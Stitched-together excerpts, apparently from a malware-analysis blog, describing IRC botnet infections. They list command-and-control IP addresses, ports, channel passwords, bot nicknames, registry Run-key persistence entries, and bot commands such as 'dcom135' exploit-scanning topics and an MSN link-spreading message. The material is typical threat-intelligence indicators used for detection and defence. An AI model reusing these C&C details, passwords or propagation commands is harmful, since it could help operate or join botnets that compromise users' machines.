Remote Host Port Number 70.61.101.163 9595 PASS prison 72.233.89.199 80 91.198.22.71 80 PONG leaf.44274.com NICK {iNF-00-USA-XP-COMP-0885} USER MEAT * 0 :COMP JOIN ###mini NICK {00-USA-XP-COMP-0172} Other details * The following ports were open in the system: Port Protocol Process 1051 TCP usbmgr.exe (%Windir%usbmgr.exe) 1053 TCP usbmgr.exe (%Windir%usbmgr.exe) 1054 TCP usbmgr.exe (%Windir%usbmgr.exe) Registry Modifications * TheRead more...

dell.special.jp 210.168.252.109 Opened listening TCP connection on port: 113 C&C Server: 210.168.252.109:17402 Server Password: Username: fdlea Nickname: DEU|77874 Channel: ##new## (Password: gatesgates) Channeltopic: :.asc asn445 100 0 2555 -a -b -r Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Service Agent” = agl23.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices “Windows Service Agent” = agl23.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Windows ServiceRead more...

Remote Host Port Number 188.72.205.89 6567 NICK {XPUSA843752} PONG irc.priv8net.com USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA843752} -ix JOIN #putocm MODE #putocm -ix Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Services = “service.exe” so that service.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Windows Update = “%Temp%service.exe” soRead more...

(IRC) [00|FRA|881622]: Bot sniff “95.142.163.184:6667” ircd here “:VirUs-pqrquk!VirUs@151.81.7.141 JOIN :#VirUs.aLiS# “ (IRC) [00|FRA|881622]: Bot sniff “95.142.163.184:6667” “:VirUs-khnmlc!VirUs@190.73.73.197 JOIN :#VirUs.aLiS# “

3.68.16.30:80 – :norks.org 001 bfqiebwf :Welcome to the Internet Relay Network bfqiebwf -psniff- suspicious BOT packet from: 74.117.174.110:21321 ircd here – :cbl-sd-74-1.aster.com.do 302 ] [laMer][lnwhcdrj :][laMer][lnwhcdrj=+~laMerl@122-120-130-36.dynamic.hinet.net -psniff- suspicious BOT packet from: 74.117.174.82:16667 – ircd here :s11.cpe.netcabo.uk 404 [M][TWN]XP-SP1[00]1694 #l# :You must have a registered nick (+r) to talk on this channel (#l#)

Remote Host Port Number 178.63.148.49 6667 NICK n{USA|XP}793757 USER 7937 “” “TsGh” :7937 JOIN #Adam Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%winlogon.exe” + UserFaultCheck = “%System%dumprep 0 -u” so that winlogon.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%winlogon.exe” soRead more...

95.154.242.89:4244″ “:HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125 :FRA|2045414!gfgjbblu@41.141.112.125 JOIN :##neo## :HTTP1.4 332 FRA|2045414 ##neo## :&psniff on :HTTP1.4 333 FRA|2045414 ##neo## Coded 1288523091 :HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125 :HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125 “

72.20.51.198:6667″: – “JOIN #die chanpass MODE [FRA|00|P|88890] -ix JOIN #die chanpass MODE [FRA|00|P|88890] -ix JOIN #die chanpass MODE [FRA|00|P|88890] -ix JOIN #die chanpass “

78.129.228.56:65267: – “JOIN #NzM# screwu nick:[M]ESP|00|XP|SP3|9898708 [M]ESP|00|XP|SP3|3576563 #NzM# :.root.start dcom135 200 0 0 219.x.x.x -a -r -s :Fooker.net 333 [M]ESP|00|XP|SP3|3576563 #NzM# weebz

Remote Host Port Number 212.175.158.43 6667 PASS lnx Resolved : [1.sarkievi.net] To [212.175.158.43] MODE [00|USA|227819] -ix JOIN #Cd# NhG NICK [00|USA|227819] USER XP-7853 * 0 :COMPUTERNAME Now talking in #Cd# Topic On: [ #Cd# ] [ .msn.msg Foto 😀 http://to.ly/7Lkw?= ] Topic By: [ Samuray ] Other details * The following port was open inRead more...